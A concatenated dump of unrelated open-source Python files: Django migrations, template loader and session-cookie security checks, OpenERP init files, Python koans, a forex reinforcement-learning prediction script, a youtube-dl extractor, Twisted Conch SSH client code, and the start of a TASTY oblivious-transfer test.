'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'course_groups.courseusergroup': {
'Meta': {'unique_together': "(('name', 'course_id'),)", 'object_name': 'CourseUserGroup'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'group_type': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'db_index': 'True', 'related_name': "'course_groups'", 'symmetrical': 'False', 'to': "orm['auth.User']"})
}
}
complete_apps = ['course_groups']
| agpl-3.0 |
cgstudiomap/cgstudiomap | main/parts/odoo/addons/sale_order_dates/__init__.py | 441 | 1071 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sale_order_dates
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
sciurus/python_koans | python3/koans/about_string_manipulation.py | 84 | 2580 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutStringManipulation(Koan):
def test_use_format_to_interpolate_variables(self):
value1 = 'one'
value2 = 2
string = "The values are {0} and {1}".format(value1, value2)
self.assertEqual(__, string)
def test_formatted_values_can_be_shown_in_any_order_or_be_repeated(self):
value1 = 'doh'
value2 = 'DOH'
string = "The values are {1}, {0}, {0} and {1}!".format(value1, value2)
self.assertEqual(__, string)
def test_any_python_expression_may_be_interpolated(self):
import math # import a standard python module with math functions
decimal_places = 4
string = "The square root of 5 is {0:.{1}f}".format(math.sqrt(5),
decimal_places)
self.assertEqual(__, string)
def test_you_can_get_a_substring_from_a_string(self):
string = "Bacon, lettuce and tomato"
self.assertEqual(__, string[7:10])
def test_you_can_get_a_single_character_from_a_string(self):
string = "Bacon, lettuce and tomato"
self.assertEqual(__, string[1])
def test_single_characters_can_be_represented_by_integers(self):
self.assertEqual(__, ord('a'))
self.assertEqual(__, ord('b') == (ord('a') + 1))
def test_strings_can_be_split(self):
string = "Sausage Egg Cheese"
words = string.split()
self.assertListEqual([__, __, __], words)
def test_strings_can_be_split_with_different_patterns(self):
import re #import python regular expression library
string = "the,rain;in,spain"
pattern = re.compile(',|;')
words = pattern.split(string)
self.assertListEqual([__, __, __, __], words)
# Pattern is a Python regular expression pattern which matches ',' or ';'
def test_raw_strings_do_not_interpret_escape_characters(self):
string = r'\n'
self.assertNotEqual('\n', string)
self.assertEqual(__, string)
self.assertEqual(__, len(string))
# Useful in regular expressions, file paths, URLs, etc.
def test_strings_can_be_joined(self):
words = ["Now", "is", "the", "time"]
self.assertEqual(__, ' '.join(words))
def test_strings_can_change_case(self):
self.assertEqual(__, 'guido'.capitalize())
self.assertEqual(__, 'guido'.upper())
self.assertEqual(__, 'TimBot'.lower())
self.assertEqual(__, 'guido van rossum'.title())
self.assertEqual(__, 'ToTaLlY aWeSoMe'.swapcase())
| mit |
liangazhou/django-rdp | packages/Django-1.8.6/django/template/loaders/cached.py | 81 | 3052 | """
Wrapper class that takes a list of template loaders as an argument and attempts
to load templates from them in order, caching the result.
"""
import hashlib
from django.template.base import Template, TemplateDoesNotExist
from django.utils.encoding import force_bytes
from .base import Loader as BaseLoader
class Loader(BaseLoader):
is_usable = True
def __init__(self, engine, loaders):
self.template_cache = {}
self.find_template_cache = {}
self.loaders = engine.get_template_loaders(loaders)
super(Loader, self).__init__(engine)
def cache_key(self, template_name, template_dirs):
if template_dirs:
# If template directories were specified, use a hash to differentiate
return '-'.join([template_name, hashlib.sha1(force_bytes('|'.join(template_dirs))).hexdigest()])
else:
return template_name
def find_template(self, name, dirs=None):
"""
Helper method. Lookup the template :param name: in all the configured loaders
"""
key = self.cache_key(name, dirs)
try:
result = self.find_template_cache[key]
except KeyError:
result = None
for loader in self.loaders:
try:
template, display_name = loader(name, dirs)
except TemplateDoesNotExist:
pass
else:
origin = self.engine.make_origin(display_name, loader, name, dirs)
result = template, origin
break
self.find_template_cache[key] = result
if result:
return result
else:
self.template_cache[key] = TemplateDoesNotExist
raise TemplateDoesNotExist(name)
def load_template(self, template_name, template_dirs=None):
key = self.cache_key(template_name, template_dirs)
template_tuple = self.template_cache.get(key)
# A cached previous failure:
if template_tuple is TemplateDoesNotExist:
raise TemplateDoesNotExist
elif template_tuple is None:
template, origin = self.find_template(template_name, template_dirs)
if not hasattr(template, 'render'):
try:
template = Template(template, origin, template_name, self.engine)
except TemplateDoesNotExist:
# If compiling the template we found raises TemplateDoesNotExist,
# back off to returning the source and display name for the template
# we were asked to load. This allows for correct identification (later)
# of the actual template that does not exist.
self.template_cache[key] = (template, origin)
self.template_cache[key] = (template, None)
return self.template_cache[key]
def reset(self):
"Empty the template cache."
self.template_cache.clear()
self.find_template_cache.clear()
| apache-2.0 |
Tjorriemorrie/trading | 14_rf_day_episodes/predict/predict.py | 1 | 17194 | import logging
from os.path import realpath, dirname
import pandas as pd
import numpy as np
import pickle
import argparse
from random import random, choice, shuffle
from pprint import pprint
from sklearn.preprocessing import scale
from time import time, sleep
import operator
import datetime
import calendar
CURRENCIES = [
'AUDUSD',
'EURGBP',
'EURJPY',
'EURUSD',
'GBPJPY',
'GBPUSD',
'NZDUSD',
'USDCAD',
'USDCHF',
'USDJPY',
]
INTERVALS = [
# '60',
'1440',
]
ACTIONS = [
'waiting',
'enter-long',
'stay-long',
'exit-long',
'enter-short',
'stay-short',
'exit-short',
'completed',
]
def main(debug):
interval = choice(INTERVALS)
for currency in CURRENCIES:
df = loadData(currency, interval)
df = dropOutliers(df)
df = setGlobalStats(df)
# print df
q = loadQ(currency, interval)
# only predict on last group
group_df = df.groupby(pd.TimeGrouper(freq='M')).get_group(df.groupby(pd.TimeGrouper(freq='M')).last().iloc[-1].name)
trail = predict(group_df, q)
logging.warn('{0} [{1}] on {4} [{2}] items => {3}'.format(currency, interval, len(group_df), trail, group_df.iloc[-1].name))
# results.append(r)
# if debug:
# break # df groups
#
# # results
# results_avg = np.mean(results)
# results_std = np.std(results)
# while len(results) > 1000:
# results.remove(min(results[:int(len(results)*results_avg)]))
#
# # adjust values
# inverse_val = 1. - max(results_avg, 0.001)
# lamda = results_avg
# alpha = inverse_val / 4.
# epsilon = alpha / 3.
#
# if time() - time_start > time_interval or debug:
# logging.warn('{7} [{0}] {1:.0f}-{6:.0f}-{5:.0f} % [e:{2:.2f}% a:{3:.1f}% l:{4:.0f}%]'.format(
# epoch,
# (results_avg - results_std) * 100,
# epsilon * 100,
# alpha * 100,
# lamda * 100,
# (results_avg + results_std) * 100,
# results_avg * 100,
# currency,
# ))
# saveQ(currency, interval, q)
# time_interval += seconds_info_intervals
#
# if (len(results) > 100 and time() - time_start >= seconds_to_run) or debug:
# # logging.error('{1} training finished at upper {0:.0f}%'.format((results_avg + results_std) * 100, currency))
# break
#
# saveQ(currency, interval, q)
#
# if debug:
# break # currencies
#
# if debug:
# break # forever
def loadData(currency, interval):
logging.info('Data: loading {0} at {1}...'.format(currency, interval))
df = pd.read_csv(
r'{0}/../../data/{1}{2}.csv'.format(realpath(dirname(__file__)), currency, interval),
names=['date', 'time', 'open', 'high', 'low', 'close', 'volume'],
parse_dates=[[0, 1]],
index_col=0,
).astype(float)
logging.info('Data: {0} rows loaded'.format(len(df)))
return df
def dropOutliers(df):
logging.info('Outliers: dropping...')
size_start = len(df)
# get range
df['range'] = df.high - df.low
# print df
# get stats
mean = df.range.mean()
std = df.range.std()
# drop outliers
min_cutoff = mean - std * 2
max_cutoff = mean + std * 2
logging.debug('Dropping outliers between below {0:4f} and above {1:4f}'.format(min_cutoff, max_cutoff))
df = df[df.range > min_cutoff]
df = df[df.range < max_cutoff]
logging.debug('Dropped {0} rows'.format(500 - len(df)))
logging.info('Outliers: {0} removed'.format(size_start - len(df)))
return df
def setGlobalStats(df):
logging.info('DF: adding non-state stats...')
# moving average
hlc = df.apply(lambda x: (x['high'] + x['low'] + x['close']) / 3, axis=1)
avg_5 = pd.rolling_mean(hlc, 5)
avg_5_y = avg_5.shift(+1)
df['ma_quick_bullish'] = avg_5 >= avg_5_y
avg_5_diff = abs(avg_5 - avg_5_y)
avg_5_diff_y = avg_5_diff.shift(+1)
df['ma_quick_divergence'] = avg_5_diff >= avg_5_diff_y
df['ma_quick_magnitude'] = avg_5_diff > avg_5_diff.mean()
avg_20 = pd.rolling_mean(hlc, 20)
avg_20_y = avg_20.shift(+1)
df['ma_signal_bullish'] = avg_20 >= avg_20_y
avg_20_diff = abs(avg_20 - avg_20_y)
avg_20_diff_y = avg_20_diff.shift(+1)
df['ma_signal_divergence'] = avg_20_diff >= avg_20_diff_y
df['ma_signal_magnitude'] = avg_20_diff > avg_20_diff.mean()
df['ma_crossover_bullish'] = avg_5 >= avg_20
ma_diff = avg_5 - avg_20
ma_diff_y = avg_5_y - avg_20_y
df['ma_crossover_divergence'] = ma_diff >= ma_diff_y
df['ma_crossover_magnitude'] = ma_diff >= ma_diff.mean()
# pivots
df_pivots = pd.DataFrame(dtype=float)
df_pivots['hlc'] = hlc
df_pivots['hlc_y1'] = hlc.shift(1)
df_pivots['hlc_y2'] = hlc.shift(2)
df_pivots['hlc_y3'] = hlc.shift(3)
df_pivots['hlc_y4'] = hlc.shift(4)
df['pivot_high_major'] = df_pivots.apply(lambda x: 1 if (x['hlc_y4'] < x['hlc_y3'] < x['hlc_y2'] and x['hlc_y2'] > x['hlc_y1'] > x['hlc']) else 0, axis=1)
df['pivot_high_minor'] = df_pivots.apply(lambda x: 1 if (x['hlc_y2'] < x['hlc_y1'] and x['hlc_y1'] > x['hlc']) else 0, axis=1)
df['pivot_low_major'] = df_pivots.apply(lambda x: 1 if (x['hlc_y4'] > x['hlc_y3'] > x['hlc_y2'] and x['hlc_y2'] < x['hlc_y1'] < x['hlc']) else 0, axis=1)
df['pivot_low_minor'] = df_pivots.apply(lambda x: 1 if (x['hlc_y2'] > x['hlc_y1'] and x['hlc_y1'] < x['hlc']) else 0, axis=1)
# situationals
df['higher_high'] = df_pivots.apply(lambda x: 1 if (x['hlc'] > x['hlc_y1']) else 0, axis=1)
df['lower_low'] = df_pivots.apply(lambda x: 1 if (x['hlc'] < x['hlc_y1']) else 0, axis=1)
df['higher_soldiers'] = df_pivots.apply(lambda x: 1 if (x['hlc'] > x['hlc_y1'] > x['hlc_y2']) else 0, axis=1)
df['lower_soldiers'] = df_pivots.apply(lambda x: 1 if (x['hlc'] < x['hlc_y1'] < x['hlc_y2']) else 0, axis=1)
# ATR
df_atr = pd.DataFrame(dtype=float)
df_atr['range'] = df['range']
df_atr['close_y'] = df['close'].shift(+1)
df_atr['h_from_c'] = abs(df['high'] - df_atr['close_y'])
df_atr['l_from_c'] = abs(df['low'] - df_atr['close_y'])
df_atr['tr'] = df_atr.apply(lambda x: max(x['range'], x['h_from_c'], x['l_from_c']), axis=1)
avg_5 = pd.rolling_mean(df_atr['tr'], 5)
avg_5_y = avg_5.shift(+1)
df['atr_quick_bullish'] = avg_5 >= avg_5_y
avg_5_diff = abs(avg_5 - avg_5_y)
avg_5_diff_y = avg_5_diff.shift(+1)
df['atr_quick_divergence'] = avg_5_diff >= avg_5_diff_y
df['atr_quick_magnitude'] = avg_5_diff > avg_5_diff.mean()
avg_20 = pd.rolling_mean(df_atr['tr'], 20)
avg_20_y = avg_20.shift(+1)
df['atr_signal_bullish'] = avg_20 >= avg_20_y
avg_20_diff = abs(avg_20 - avg_20_y)
avg_20_diff_y = avg_20_diff.shift(+1)
df['atr_signal_divergence'] = avg_20_diff >= avg_20_diff_y
df['atr_signal_magnitude'] = avg_20_diff > avg_20_diff.mean()
df['atr_crossover_bullish'] = avg_5 >= avg_20
atr_diff = avg_5 - avg_20
atr_diff_y = avg_5_y - avg_20_y
df['atr_crossover_divergence'] = atr_diff >= atr_diff_y
df['atr_crossover_magnitude'] = atr_diff >= atr_diff.mean()
# print df
# raise Exception('foo')
logging.info('DF: added non-state stats')
return df
def loadQ(currency, interval):
logging.info('Q: loading...')
try:
with open('{0}/models/{1}_{2}.q'.format(realpath(dirname(__file__)), currency, interval), 'rb') as f:
q = pickle.load(f)
except IOError:
q = {}
logging.info('Q: loaded {0}'.format(len(q)))
return q
def saveQ(currency, interval, q):
logging.info('Q: saving...')
with open('{0}/models/{1}_{2}.q'.format(realpath(dirname(__file__)), currency, interval), 'wb') as f:
pickle.dump(q, f)
logging.info('Q: saved {0}'.format(len(q)))
def predict(df, q):
logging.info('Predicting: started...')
# get bdays
first_bday = df.index[0]
first_day = first_bday.replace(day=1)
last_day = first_day.replace(day=calendar.monthrange(first_bday.year, first_bday.month)[1])
bdays_days = pd.bdate_range(start=first_bday, end=last_day)
bdays = len(bdays_days)
trail = ''
# initial state
i = 0.
s = getState(df, i, bdays)
# initial action
a = getAction(q, s, 0)
for date_time, row in df.iterrows():
logging.info(' ')
logging.info('Environment: {0}/{1} {2}'.format(i, len(df)-1, date_time))
logging.info('State: {0}'.format(sum(s)))
logging.info('Action: {0}'.format(a))
# take action (get trade status for s_next)
s_ts, trail = takeAction(s, a, trail)
# next environment
i_next = i + 1
if i_next >= len(df):
s_next = None
a_next = None
else:
s_next = getState(df, i_next, bdays, s_ts)
a_next = getAction(q, s_next, 0)
a = a_next
s = s_next
i += 1
# logging.warn('Trail {0}'.format(trail))
return trail
########################################################################################################
# WORLD
########################################################################################################
def getState(df, i, bdays, s_ts=None):
logging.info('State: from {0}...'.format(i))
s = []
# trade status
if not s_ts:
s_trade_status = [1, 0, 0, 0]
else:
s_trade_status = s_ts
s += s_trade_status
logging.debug('State: trade status {0}'.format(s_trade_status))
# group progress
s_group_progress = [1 if (i+1)/bdays > t/25. else 0 for t in xrange(0, 25)]
s += s_group_progress
logging.debug('State: group progress {0}'.format(s_group_progress))
# current row
row = df.iloc[i]
# print row
# trend 5/20
s_trend = []
s_trend.append(1 if row['ma_quick_bullish'] else 0)
s_trend.append(1 if row['ma_quick_divergence'] else 0)
s_trend.append(1 if row['ma_quick_magnitude'] else 0)
s_trend.append(1 if row['ma_signal_bullish'] else 0)
s_trend.append(1 if row['ma_signal_divergence'] else 0)
s_trend.append(1 if row['ma_signal_magnitude'] else 0)
s_trend.append(1 if row['ma_crossover_bullish'] else 0)
s_trend.append(1 if row['ma_crossover_divergence'] else 0)
s_trend.append(1 if row['ma_crossover_magnitude'] else 0)
s += s_trend
logging.debug('State: moving average {0}'.format(s_trend))
# peaks
s_peaks = [
row['pivot_high_major'],
row['pivot_high_minor'],
row['pivot_low_major'],
row['pivot_low_minor']
]
s += s_peaks
logging.debug('State: peaks {0}'.format(s_peaks))
# situationals
s_situationals = [
row['higher_high'],
row['lower_low'],
row['higher_soldiers'],
row['lower_soldiers']
]
s += s_situationals
logging.debug('State: situationals {0}'.format(s_situationals))
# ATR 5/20
s_atr = []
s_atr.append(1 if row['atr_quick_bullish'] else 0)
s_atr.append(1 if row['atr_quick_divergence'] else 0)
s_atr.append(1 if row['atr_quick_magnitude'] else 0)
s_atr.append(1 if row['atr_signal_bullish'] else 0)
s_atr.append(1 if row['atr_signal_divergence'] else 0)
s_atr.append(1 if row['atr_signal_magnitude'] else 0)
s_atr.append(1 if row['atr_crossover_bullish'] else 0)
s_atr.append(1 if row['atr_crossover_divergence'] else 0)
s_atr.append(1 if row['atr_crossover_magnitude'] else 0)
s += s_atr
logging.debug('State: average true range {0}'.format(s_atr))
logging.info('State: {0}/{1}'.format(sum(s), len(s)))
return s
def getActionsAvailable(trade_status):
logging.debug('Action: finding available for {0}...'.format(trade_status))
# validate trade status
if sum(trade_status) != 1:
raise Exception('Invalid trade status')
# looking
if trade_status[0]:
actions_available = ['waiting', 'enter-long', 'enter-short']
# buying
elif trade_status[1]:
actions_available = ['stay-long', 'exit-long']
# selling
elif trade_status[2]:
actions_available = ['stay-short', 'exit-short']
# finished
elif trade_status[3]:
actions_available = ['completed']
else:
raise Exception('Unknown state {0}'.format(trade_status))
logging.debug('Action: found {0} for {1}...'.format(actions_available, trade_status))
return actions_available
def takeAction(s, a, trail):
logging.info('Change: state {0} with action {1}...'.format(s, a))
# take action
if a in ['waiting']:
s_trade_status = [1, 0, 0, 0]
trail += '_'
elif a in ['enter-long', 'stay-long']:
s_trade_status = [0, 1, 0, 0]
trail += 'B'
elif a in ['enter-short', 'stay-short']:
s_trade_status = [0, 0, 1, 0]
trail += 'S'
elif a in ['exit-long', 'exit-short', 'completed']:
s_trade_status = [0, 0, 0, 1]
trail += '!'
else:
raise Exception('Unknown action [{0}] to take on state [{1}]'.format(a, s[:4]))
logging.info('Change: trail = {0}'.format(trail))
logging.info('Change: state is now {0}...'.format(s_trade_status))
return s_trade_status, trail
def getReward(trail, optimus):
logging.info('Reward: trail vs optimus')
optimus_len = len(optimus) + 0.
# precision
r_correct = sum(map(operator.eq, trail, optimus))
r_precision = r_correct / optimus_len
logging.debug('Reward: correct {0:.0f} => {1:.2f}'.format(r_correct, r_precision))
# length
# r_length_optimus = optimus.count('B' if 'B' in optimus else 'S')
# r_length_trail = trail.count('B' if 'B' in optimus else 'S')
# r_length = 1 - (abs(r_length_trail - r_length_optimus) / max(optimus_len - r_length_optimus, r_length_optimus))
# logging.debug('Reward: trade length {0:.0f} vs {1:.0f} => {2:.2f}'.format(r_length_trail, r_length_optimus, r_length))
#
# r = np.mean([r_precision, r_length])
r = r_precision
logging.info('Reward: {0:.2f}'.format(r))
return r
########################################################################################################
# SARSA
########################################################################################################
def getAction(q, s, epsilon):
logging.info('Action: finding...')
actions_available = getActionsAvailable(s[:4])
# exploration
if random() < epsilon:
logging.debug('Action: explore (<{0:.2f})'.format(epsilon))
a = choice(actions_available)
# exploitation
else:
logging.debug('Action: exploit (>{0:.2f})'.format(epsilon))
q_max = None
for action in actions_available:
q_sa = q.get((tuple(s), action), random() * 10.)
logging.debug('Qsa action {0} is {1:.4f}'.format(action, q_sa))
if q_sa > q_max:
q_max = q_sa
a = action
logging.info('Action: found {0}'.format(a))
return a
def getDelta(q, s, a, r, s_next, a_next, gamma):
logging.info('Delta: calculating...')
q_sa = q.get((tuple(s), a), 0)
if not s_next or not a_next:
q_sa_next = r
else:
q_sa_next = q.get((tuple(s_next), a_next), r)
d = r + (gamma * q_sa_next) - q_sa
logging.debug('Delta: r [{0:.2f}] + (gamma [{1:.2f}] * Qs`a` [{2:.4f}]) - Qsa [{3:.4f}]'.format(r, gamma, q_sa_next, q_sa))
logging.info('Delta: {0:.4f}'.format(d))
return d
def updateQ(q, s, a, d, r, etraces, lamda, gamma, alpha):
logging.info('Q: updating learning at {0:.2f} with lambda {1:.2f}...'.format(alpha, lamda))
# update current s,a
sa = (tuple(s), a)
etraces[sa] = etraces.get(sa, 0.) + 1
# update for all etraces
etraces_updated = {}
for sa, e_sa in etraces.iteritems():
# q (only if there is a reward)
if r:
q_sa = q.get(sa, r)
# logging.debug('Q: Qsa before {0:.4f}'.format(q_sa))
# logging.debug('Q: d:{0:.2f} e:{1:.2f}'.format(d, e_sa))
q_sa_updated = q_sa + (alpha * d * e_sa)
q[sa] = q_sa_updated
logging.debug('Q: before {0:.4f} \t et {1:.2f} \t after {2:.4f}'.format(q_sa, e_sa, q_sa_updated))
# decay etrace
if e_sa > 0.01:
etraces_updated[sa] = e_sa * gamma * lamda
return q, etraces_updated
########################################################################################################
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--debug', action='store_true')
args = parser.parse_args()
debug = args.debug
lvl = logging.DEBUG if debug else logging.WARN
logging.basicConfig(
level=lvl,
format='%(asctime)s %(name)-8s %(levelname)-8s %(message)s',
# datefmt='%Y-%m-%d %H:%M:',
)
main(debug) | mit |
vijayanandnandam/youtube-dl | youtube_dl/extractor/crooksandliars.py | 64 | 2061 | from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
int_or_none,
qualities,
)
class CrooksAndLiarsIE(InfoExtractor):
_VALID_URL = r'https?://embed\.crooksandliars\.com/(?:embed|v)/(?P<id>[A-Za-z0-9]+)'
_TESTS = [{
'url': 'https://embed.crooksandliars.com/embed/8RUoRhRi',
'info_dict': {
'id': '8RUoRhRi',
'ext': 'mp4',
'title': 'Fox & Friends Says Protecting Atheists From Discrimination Is Anti-Christian!',
'description': 'md5:e1a46ad1650e3a5ec7196d432799127f',
'thumbnail': r're:^https?://.*\.jpg',
'timestamp': 1428207000,
'upload_date': '20150405',
'uploader': 'Heather',
'duration': 236,
}
}, {
'url': 'http://embed.crooksandliars.com/v/MTE3MjUtMzQ2MzA',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(
'http://embed.crooksandliars.com/embed/%s' % video_id, video_id)
manifest = self._parse_json(
self._search_regex(
r'var\s+manifest\s*=\s*({.+?})\n', webpage, 'manifest JSON'),
video_id)
quality = qualities(('webm_low', 'mp4_low', 'webm_high', 'mp4_high'))
formats = [{
'url': item['url'],
'format_id': item['type'],
'quality': quality(item['type']),
} for item in manifest['flavors'] if item['mime'].startswith('video/')]
self._sort_formats(formats)
return {
'url': url,
'id': video_id,
'title': manifest['title'],
'description': manifest.get('description'),
'thumbnail': self._proto_relative_url(manifest.get('poster')),
'timestamp': int_or_none(manifest.get('created')),
'uploader': manifest.get('author'),
'duration': int_or_none(manifest.get('duration')),
'formats': formats,
}
| unlicense |
sinkuri256/python-for-android | python-modules/twisted/twisted/conch/client/direct.py | 60 | 3234 | # Copyright (c) 2001-2008 Twisted Matrix Laboratories.
# See LICENSE for details.
from twisted.internet import defer, protocol, reactor
from twisted.conch import error
from twisted.conch.ssh import transport
from twisted.python import log
class SSHClientFactory(protocol.ClientFactory):
def __init__(self, d, options, verifyHostKey, userAuthObject):
self.d = d
self.options = options
self.verifyHostKey = verifyHostKey
self.userAuthObject = userAuthObject
def clientConnectionLost(self, connector, reason):
if self.options['reconnect']:
connector.connect()
def clientConnectionFailed(self, connector, reason):
if self.d is None:
return
d, self.d = self.d, None
d.errback(reason)
def buildProtocol(self, addr):
trans = SSHClientTransport(self)
if self.options['ciphers']:
trans.supportedCiphers = self.options['ciphers']
if self.options['macs']:
trans.supportedMACs = self.options['macs']
if self.options['compress']:
trans.supportedCompressions[0:1] = ['zlib']
if self.options['host-key-algorithms']:
trans.supportedPublicKeys = self.options['host-key-algorithms']
return trans
class SSHClientTransport(transport.SSHClientTransport):
def __init__(self, factory):
self.factory = factory
self.unixServer = None
def connectionLost(self, reason):
if self.unixServer:
d = self.unixServer.stopListening()
self.unixServer = None
else:
d = defer.succeed(None)
d.addCallback(lambda x:
transport.SSHClientTransport.connectionLost(self, reason))
def receiveError(self, code, desc):
if self.factory.d is None:
return
d, self.factory.d = self.factory.d, None
d.errback(error.ConchError(desc, code))
def sendDisconnect(self, code, reason):
if self.factory.d is None:
return
d, self.factory.d = self.factory.d, None
transport.SSHClientTransport.sendDisconnect(self, code, reason)
d.errback(error.ConchError(reason, code))
def receiveDebug(self, alwaysDisplay, message, lang):
log.msg('Received Debug Message: %s' % message)
if alwaysDisplay: # XXX what should happen here?
print message
def verifyHostKey(self, pubKey, fingerprint):
return self.factory.verifyHostKey(self, self.transport.getPeer().host, pubKey,
fingerprint)
def setService(self, service):
log.msg('setting client server to %s' % service)
transport.SSHClientTransport.setService(self, service)
if service.name != 'ssh-userauth' and self.factory.d is not None:
d, self.factory.d = self.factory.d, None
d.callback(None)
def connectionSecure(self):
self.requestService(self.factory.userAuthObject)
def connect(host, port, options, verifyHostKey, userAuthObject):
d = defer.Deferred()
factory = SSHClientFactory(d, options, verifyHostKey, userAuthObject)
reactor.connectTCP(host, port, factory)
return d
| apache-2.0 |
danilito19/django | django/core/checks/security/sessions.py | 477 | 2595 | from django.conf import settings
from .. import Tags, Warning, register
def add_session_cookie_message(message):
return message + (
" Using a secure-only session cookie makes it more difficult for "
"network traffic sniffers to hijack user sessions."
)
W010 = Warning(
add_session_cookie_message(
"You have 'django.contrib.sessions' in your INSTALLED_APPS, "
"but you have not set SESSION_COOKIE_SECURE to True."
),
id='security.W010',
)
W011 = Warning(
add_session_cookie_message(
"You have 'django.contrib.sessions.middleware.SessionMiddleware' "
"in your MIDDLEWARE_CLASSES, but you have not set "
"SESSION_COOKIE_SECURE to True."
),
id='security.W011',
)
W012 = Warning(
add_session_cookie_message("SESSION_COOKIE_SECURE is not set to True."),
id='security.W012',
)
def add_httponly_message(message):
return message + (
" Using an HttpOnly session cookie makes it more difficult for "
"cross-site scripting attacks to hijack user sessions."
)
W013 = Warning(
add_httponly_message(
"You have 'django.contrib.sessions' in your INSTALLED_APPS, "
"but you have not set SESSION_COOKIE_HTTPONLY to True.",
),
id='security.W013',
)
W014 = Warning(
add_httponly_message(
"You have 'django.contrib.sessions.middleware.SessionMiddleware' "
"in your MIDDLEWARE_CLASSES, but you have not set "
"SESSION_COOKIE_HTTPONLY to True."
),
id='security.W014',
)
W015 = Warning(
add_httponly_message("SESSION_COOKIE_HTTPONLY is not set to True."),
id='security.W015',
)
@register(Tags.security, deploy=True)
def check_session_cookie_secure(app_configs, **kwargs):
errors = []
if not settings.SESSION_COOKIE_SECURE:
if _session_app():
errors.append(W010)
if _session_middleware():
errors.append(W011)
if len(errors) > 1:
errors = [W012]
return errors
@register(Tags.security, deploy=True)
def check_session_cookie_httponly(app_configs, **kwargs):
errors = []
if not settings.SESSION_COOKIE_HTTPONLY:
if _session_app():
errors.append(W013)
if _session_middleware():
errors.append(W014)
if len(errors) > 1:
errors = [W015]
return errors
def _session_middleware():
return ("django.contrib.sessions.middleware.SessionMiddleware" in
settings.MIDDLEWARE_CLASSES)
def _session_app():
return "django.contrib.sessions" in settings.INSTALLED_APPS
| bsd-3-clause |
charbeljc/account-financial-tools | account_asset_management_xls/wizard/__init__.py | 34 | 1107 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
#
# Copyright (c) 2014 Noviat nv/sa (www.noviat.com). All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import account_asset_report_wizard
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
tastyproject/tasty | tasty/tests/unittests/tastyot_test.py | 1 | 5312 | # -*- coding: utf-8 -*-
import unittest
from tasty.tastyot import TastyOT
from multiprocessing import Process
from tasty.osock import *
from time import sleep
from tasty.types import Party
from tasty import utils, config, state
from tasty.protocols.otprotocols import paillierot
from tasty.protocols.otprotocols import PaillierOT, ECNaorPinkasOT
import socket, atexit
from gmpy import mpz
from itertools import product
import time
#TODO: @Immo: please document how OT tests work
class TastyOTTestCase(unittest.TestCase):
